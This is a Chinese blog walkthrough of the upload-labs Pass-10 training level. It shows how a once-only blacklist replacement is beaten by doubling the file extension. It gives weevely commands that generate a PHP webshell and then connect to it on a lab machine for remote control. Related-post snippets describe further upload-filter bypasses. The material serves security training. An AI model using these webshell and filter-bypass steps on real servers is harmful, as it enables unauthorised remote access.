Upload-Labs-Pass-10

最新推荐文章于 2024-10-21 19:27:42 发布
原创 最新推荐文章于 2024-10-21 19:27:42 发布 · 160 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #网络安全

本文介绍了双写绕过原理,通过在代码中利用该原理绕过过滤机制。展示了在Kali攻击机上针对Windows2008靶机的环境搭配,详细讲解了如何创建并上传webshell,以及如何修改文件名以绕过限制。最终,通过Weevely工具成功连接到靶机,实现远程控制。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

一、相关知识

1、双写绕过原理:

二、环境搭配

三、文件上传

1、创建webshell

 2、修改文件名

3、文件上传

四、Weevely连接

一、相关知识

1、双写绕过原理:

代码编写过程中,只对黑名单中的内容进行空替换,因为只替换一次所以造成双写绕过。

二、环境搭配

攻击机:kaliIP:192.168.0.112
靶机:Windows2008IP:192.168.0.130:9006

三、文件上传

1、创建webshell

格式:weevely generate 密码 文件的保存路径 文件名
命令:weevely generate cmd /home/kali/网络安全/木马/weevely.php

 2、修改文件名

 在原来文件名后面添加hpp

3、文件上传

 右键点击图片使用新标签打开图片,可以发现图片上传的路径。

 将hpp改为php

四、Weevely连接

添加数据:将图片路径复制到URL地址,设置密码(文件中的cmd),成功连接。

格式:weevely 文件的URL 密码
命令:weevely http://192.168.0.130:9006/upload/weevely.php cmd

 

 

Upload-Labs-Pass-08
龙狼刺的博客
04-21 1274
一、相关知识 1、特殊符号绕过原理: Windows系统下,如果上传文件的文件名为test.php::$DATA,则会在服务器中生成一个为test.php文件,其中内容和所上传的文件内容相同,并被解析。 二、环境搭配 攻击机: kali IP: 192.168.0.112 靶机: Windows2008 IP: 192.168.0.130:9006 三、文件上传 1、创建webshell 格式:weevely generate 密码 ...
upload-labs靶场攻略(pass1-16)
Kiber
04-19 1209
参考官方即可:upload-labs靶场下载地址:https://github.com/c0ny1/upload-labs1、可以绕过目标服务器的检测,成功上传。2、可以获取到木马文件的存储路径,存储路程具备可执行权限。准备一个webshell.php脚本文件, 是一个简单的一句话木马 将脚本文件上传, 结果直接被网站拦截掉了第一种方法:第一就是将浏览器js代码禁用掉,右键---检查---调试器---设置---禁用JavaScript。上传webshell文件。鼠标右键查看该图像的地址, 即为webs
Upload LABS Pass-10 双写后缀名绕过
热门推荐
wangyuxiang946的博客
07-03 1万+
uploadlabs10upload labs 第十关在后端用黑名单过滤文件后缀名,将匹配到的后缀名替换为空,但其只过滤了一遍,我们可双写后缀名绕过。
upload-labs:pass-08
羽的博客
07-09 204
$is_upload = false; $msg = null; if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",...
upload-labs pass-06
weixin_50339082的博客
06-23 229
upload-labs pass-06 Pass-06 先看一下源码(黑名单绕过–大小写绕过): $is_upload = false; $msg = null; if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pH
upload-labspass-10
羽的博客
07-09 151
$is_upload = false; $msg = null; if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".p...
upload-labs-writeup-master.zip
10-25
【标题】"upload-labs-writeup-master.zip" 涉及的是一个关于上传漏洞实验室的环境搭建资源。这个压缩包包含了一个完整的实验环境,目的是帮助用户理解和学习如何防范和检测Web应用中的上传漏洞。 【描述】中提到,...
upload-labs19-20以及总结1
08-08
Pass19中,开发者试图通过限制上传文件的扩展名来防止这种攻击,但是他们只检查了保存文件名(`save_name`)是否包含黑名单中的扩展名,而未检查实际上传文件的类型。 以下是该关卡的主要知识点: 1. **文件名...
upload-labs-0.1.zip
12-21
1)推荐使用Windows系统搭建(注:使用docker pull c0ny1/upload-labs的镜像在Pass-03会遇到问题,初步判断是该镜像内的php.conf文件配置错误导致)。 2)下载地址 ...
[网络安全]upload-labs Pass-14 解题详析_upload-labs-linux pass14(1)
2401_84972580的博客
05-13 459
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
upload-labs通关(Pass-06~Pass-10
箭雨镜屋
10-08 2039
Pass-06 上传sh.php失败,burp中将抓到的包send to repeater 修改filename为sh.xxx发现可以上传成功,说明是黑名单过滤 将报文send to intruder,按照Pass-03的套路爆破后缀名(upload-labs通关(Pass-01~Pass-05)_箭雨镜屋-CSDN博客) 爆破结果用../upload过滤,发现只有如下后缀的文件上传成功 仔细查看Response报文后发现,有如下两个文件可以作为webshell(服务器是window.
upload-labs靶场-Pass-10-思路以及过程
weixin_44257023的博客
01-16 2760
开始前的小准备 upload-labs靶场 是PHP环境运行的,所以我准备了一个PHP脚本和一张图片 图片好准备,PHP脚本如果不想写的话可以用我的这个获取当前时间的PHP脚本 <?php header("content-type:text/html;charset=utf-8"); date_default_timezone_set("PRC");//设置时区 echo "当前时间为:"; $today = date("Y-m-d D h:i:s A "); echo $today; ?
Upload LABS Pass-8
wangyuxiang946的博客
07-03 1万+
uploadlabs8,upload labs 第八关在后端用黑名单过滤后缀名,并过滤了大小写、点、空格,我们抓包在文件后缀名中添加数据流::$DATA绕过。
upload-labs靶场-Pass-08关-思路以及过程
weixin_44257023的博客
01-16 2302
开始前的小准备 upload-labs靶场 是PHP环境运行的,所以我准备了一个PHP脚本和一张图片 图片好准备,PHP脚本如果不想写的话可以用我的这个获取当前时间的PHP脚本 <?php header("content-type:text/html;charset=utf-8"); date_default_timezone_set("PRC");//设置时区 echo "当前时间为:"; $today = date("Y-m-d D h:i:s A "); echo $today; ?
upload-labs通关(Pass06-Pass10)
m0_46467017的博客
08-15 699
首先trim()删除文件名末尾的多个空格,然后deldot()删除文件名末尾的多个点,strrchr()以第一个.为界取出后缀,strtolower()将后缀转化为小写,str_ireplace()去掉后缀中的一个::$DATA,最后trim()删除后缀末尾的多个空格。处理完的后缀与黑名单对比,如果后缀不在黑名单中,则上传后的文件名是去掉文件名末尾的空格,再去掉文件名末尾的点之后的文件名。按照这个顺序倒推,就可以发现后缀.php. .(点空格点)是可以绕过黑名单检查的。发现本关的代码与之前的代码少了。...
upload-labs靶场Pass-10
wanggonghanfei的博客
10-21 282
upload-labs靶场Pass-10
Upload-labs文件上传漏洞(双写绕过)——Pass10
Zichel77的博客
07-28 1070
0×00 题目概述 所以说是双写吗? 0×01 源代码 $is_upload = false; $msg = null; if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv",.
upload-labs】————9、Pass-08
Fly_鹏程万里
08-15 519
闯关界面 前端检查还是后端检测判断: 查看源代码: 黑名单检测、先转小写后匹配、去除文件后缀名中的空格、点,但是缺少考虑了一个::$DATA,利用windows特性,我们可在后缀名中加” ::$DATA”绕过: 之后再浏览器中访问: ...
upload-labs】————8、Pass-07
Fly_鹏程万里
08-15 554
闯关界面 前后端检测判断 查看源代码 文件后缀大小写、去除::$DATA、关键词过滤,在这里可以发现所有的都考虑到了,但是却没有考虑后缀为.的情况,在windows中PHP会自动去除后缀名中最后的“.”,我们可以通过这种方式来绕过: 加“.”来绕过: ...
upload-labs pass21
最新发布
07-20
upload-labs 项目中,Pass-21 的解题思路主要围绕文件上传时的 **MIME 类型验证绕过** 和 **文件名解析漏洞利用**。虽然未在提供的引用中直接提及 Pass-21 的具体细节,但根据 upload-labs 系列的常见设计逻辑,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

liebe1*1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值